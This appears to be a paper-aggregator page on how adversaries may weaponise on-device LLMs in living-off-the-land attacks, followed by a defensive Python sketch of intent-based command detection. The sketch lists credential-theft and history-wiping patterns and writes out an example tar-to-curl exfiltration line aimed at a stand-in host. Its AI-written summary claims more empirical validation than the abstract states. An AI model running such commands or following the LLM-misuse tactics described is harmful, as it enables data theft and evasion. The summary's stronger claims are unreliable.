Living Off the LLM: How LLMs Will Change Adversary Tactics

📅 2025-10-13
🤖 AI Summary
This study shows that on-device large language models (LLMs) can be weaponized by adversaries within "Living-off-the-Land" (LotL) attack chains, serving as novel semantic-level attack vectors. Current defenses focus predominantly on monitoring suspicious tools while neglecting the semantic behaviors of LLMs, leaving a critical blind spot.

Method: We propose and empirically validate that LLMs can autonomously generate malicious commands, author evasion-capable, benign-looking scripts, and orchestrate end-to-end penetration tasks, all without relying on external malicious binaries. Our approach integrates adversarial machine learning, attack-chain modeling, and threat intelligence analysis to build an end-to-end attack simulation framework, and introduces an intent-aware, semantic-behavior detection paradigm.

Results: We demonstrate that LLMs significantly expand the scope and stealth of LotL attacks, enabling high adaptability and persistence. This necessitates a paradigm shift in security defense, from tool-centric monitoring to semantic-behavioral analysis, thereby redefining the boundaries of endpoint threat detection.

📝 Abstract
In living-off-the-land attacks, malicious actors use legitimate tools and processes already present on a system to avoid detection. In this paper, we explore how the on-device LLMs of the future may become a security concern as threat actors integrate LLMs into their living-off-the-land attack pipelines, and we discuss ways the security community may mitigate this threat.
Problem

Research questions and friction points this paper is trying to address.

LLMs may enable adversaries to evade detection using legitimate tools
Threat actors could integrate LLMs into living-off-the-land attacks
Security community must develop mitigation strategies for LLM-based threats
Innovation

Methods, ideas, or system contributions that make the work stand out.

Using LLMs to evade detection systems
Integrating LLMs into existing attack pipelines
Developing mitigation strategies for LLM-enabled attacks
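To make the tool-centric vs. semantic-behavioral distinction concrete, here is a minimal sketch of intent-level command scoring. This is not the paper's detection system: the `INTENT_SIGNATURES` table, the intent names, and the `score_command` helper are all hypothetical, and the regex rules are only a stand-in for the ML-based semantic classifier the summary describes. The point is the unit of detection: the behavior expressed by a whole command line, not the name of the (legitimate) binary that carries it.

```python
import re
from dataclasses import dataclass, field

# Hypothetical intent signatures: each maps a semantic behavior (not a tool
# name) to patterns over an entire command line. Every binary below (tar,
# curl, base64) is a legitimate LotL tool, so tool-centric allowlisting
# would miss these; the intent of the composed command is what's flagged.
INTENT_SIGNATURES = {
    "credential_access": [r"/etc/shadow", r"ntds\.dit"],
    "staged_exfiltration": [r"tar\s+.*\|\s*curl", r"base64\s+.*\|\s*(curl|wget)"],
    "defense_evasion": [r"history\s+-c", r"unset\s+HISTFILE"],
}

@dataclass
class Finding:
    command: str
    intents: list = field(default_factory=list)

def score_command(command: str) -> Finding:
    """Return the semantic intents matched by a command line, ignoring
    which legitimate binary performs the behavior."""
    matched = [
        intent
        for intent, patterns in INTENT_SIGNATURES.items()
        if any(re.search(p, command) for p in patterns)
    ]
    return Finding(command=command, intents=matched)

if __name__ == "__main__":
    # A benign listing and a legitimate-tools-only exfiltration pipeline.
    for cmd in [
        "ls -la /tmp",
        "tar czf - /home/user/docs | curl -T - https://drop.example",
    ]:
        print(score_command(cmd))
```

An LLM-assisted attacker can trivially rewrite a command to dodge any fixed pattern list like this one, which is exactly why the summary argues for intent-aware models rather than static rules; the sketch only illustrates where the detection boundary would move.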